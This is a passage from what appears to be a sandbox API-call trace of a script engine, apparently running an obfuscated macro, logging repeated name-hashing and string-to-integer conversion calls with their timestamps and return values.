(syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CowAkACA") returned 0x10792d [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQQUAAAc") returned 0x102b6d [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wcAkAAAZ") returned 0x10a659 [0067.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.869] VarI4FromStr (in: strIn="885438544", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cUDAAxZ") returned 0x108241 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wBDGDXBA") returned 0x102719 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oDA4AAAk") returned 0x10cd4b [0067.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.869] VarI4FromStr (in: strIn="343875962", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] VarI4FromStr (in: strIn="50001065", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] VarI4FromStr (in: strIn="225226798", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] VarI4FromStr (in: strIn="448538041", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] VarI4FromStr (in: strIn="151686969", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUGD1QA") returned 0x10e90b [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sDoAAAw") returned 0x102eb3 [0067.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.869] VarI4FromStr (in: strIn="618128023", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] VarI4FromStr (in: strIn="22695148", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KkQAA4A") returned 0x1000ce [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.869] VarI4FromStr (in: strIn="146081683", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] VarI4FromStr (in: strIn="372476552", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.869] VarI4FromStr (in: strIn="599964027", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] VarI4FromStr (in: strIn="518260203", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.870] VarI4FromStr (in: strIn="423826953", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAAUXX") returned 0x108a89 [0067.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.870] VarI4FromStr (in: strIn="516595982", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="n_XAA4B4") returned 0x107cf9 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FBAXAQ") returned 0x10d4dc [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XcBDoAA") returned 0x108202 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vQAUkA") returned 0x10bde0 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i1A1ACk") returned 0x10bc6d [0067.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.870] VarI4FromStr (in: strIn="87976697", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QACwAA") returned 0x10bd1b [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wxXBAAZ") returned 0x1092fa [0067.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JU1AUAo") returned 0x10cc0a [0067.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.870] VarI4FromStr (in: strIn="358550106", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] VarI4FromStr (in: strIn="212667769", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] VarI4FromStr (in: strIn="163233069", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] VarI4FromStr (in: strIn="306411280", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.870] VarI4FromStr (in: strIn="195696298", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAkBkXU") returned 0x10a281 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uUQoABU") returned 0x1013cb [0067.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.871] VarI4FromStr (in: strIn="525638850", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] VarI4FromStr (in: strIn="774841443", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vUGc4AD") returned 0x101e74 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.871] VarI4FromStr (in: strIn="858232010", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] VarI4FromStr (in: strIn="53210131", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.871] VarI4FromStr (in: strIn="988805417", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] VarI4FromStr (in: strIn="503024027", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.871] VarI4FromStr (in: strIn="207016193", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAAAUAB") returned 0x101225 [0067.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.871] VarI4FromStr (in: strIn="662030693", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jCDUQBA") returned 0x106405 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DD1BcQ") returned 0x10fb52 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lZAAAAZ") returned 0x1070aa [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAAwAQ") returned 0x101afa [0067.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.872] VarI4FromStr (in: strIn="67143868", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBQAAc") returned 0x103cb0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAG_GA1Z") returned 0x10bbe7 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zABD4AA") returned 0x1043d4 [0067.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.872] VarI4FromStr (in: strIn="297792184", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="357460329", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="548988448", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="932182574", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="936134046", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jUQcAA") returned 0x10ee75 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="H4DAUQ") returned 0x10e088 [0067.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.872] VarI4FromStr (in: strIn="626599904", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="975563213", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jxkoUBco") returned 0x106396 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.872] VarI4FromStr (in: strIn="661655923", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="452087199", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.872] VarI4FromStr (in: strIn="609188567", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] VarI4FromStr (in: strIn="625639413", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.873] VarI4FromStr (in: strIn="895592812", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WBcU1DUQ") returned 0x10f785 [0067.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.873] VarI4FromStr (in: strIn="663863780", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OACZGUXw") returned 0x10fc0e [0067.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.873] VarI4FromStr (in: strIn="412733974", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="667626372", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="303263867", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="323554794", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="544822710", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="181249950", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="184501233", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="456602215", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="644358171", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="908497784", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="835901720", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="104723595", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="225731827", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="604630760", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="79629697", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="516582996", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.873] VarI4FromStr (in: strIn="173237052", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="825369543", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="734322436", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="116482695", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="171651194", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="651175801", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="313624370", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="208804076", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="191987723", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="630178639", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="79638572", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="537609104", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="358993259", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="980235684", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="788523278", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="388497397", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="783555074", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="622254746", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="559965696", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="467600073", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="846780460", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="810084748", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="967624359", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="502310089", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.874] VarI4FromStr (in: strIn="987678092", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="557849565", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="856842228", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="513631674", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="65636382", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="370570703", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="744228404", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="13867541", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="542006575", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="867637357", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="153351568", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="371396631", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="689498893", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="191779870", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="230439372", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="442738466", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="59533938", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="568384418", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="994689892", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="601365489", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="389640096", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="941160157", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="228217510", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="674068596", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.875] VarI4FromStr (in: strIn="98049360", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="503735455", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="455441233", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="370135828", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="882156366", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="706590856", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.876] VarI4FromStr (in: strIn="740664047", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="617455830", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="282708370", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="326642152", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="811660588", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: 